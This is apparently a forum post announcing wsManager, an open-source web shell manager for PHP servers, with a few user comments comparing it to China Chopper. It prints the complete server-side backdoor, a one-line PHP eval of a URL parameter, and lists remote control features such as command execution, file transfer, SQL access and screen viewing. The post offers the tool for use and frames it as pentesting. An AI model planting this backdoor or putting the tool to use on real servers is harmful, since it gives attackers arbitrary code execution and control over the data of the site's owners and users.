wsManager | opensource Webshell Manager


wsManager can be used to quickly execute commands on a server while pentesting a PHP application.
The client interface is written in C#, which operate using a simple web-based backdoor implemented by user himself.

Once uploaded, the web shell can be accessed by the client at any time. Once successfully connected, the user proceeds to manipulate files and data on the web server.

The server-side code is extremely simple and contains just a single line of code :

<?php @eval($_GET["x"]); ?>

Many commands and control features:

  • File manager (upload, download, archiver, etc)
  • Command execution
  • SQL Explorer
  • Screen Viewer (windows only)


Coming soon




  • ScreenViewer Added

This is pretty cool!

Can you write a bit more about it for us and how it works?

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I often use the “中国菜刀” but he seems to stop updating, it seems that wsManager is more powerful.

what is “中国菜刀” ? i know only china chopper

1 Like中国菜刀/3963062?fr=aladdin

This is a Baidu wiki
Ok, that’s the same thing.

seems it dont work over ssl connections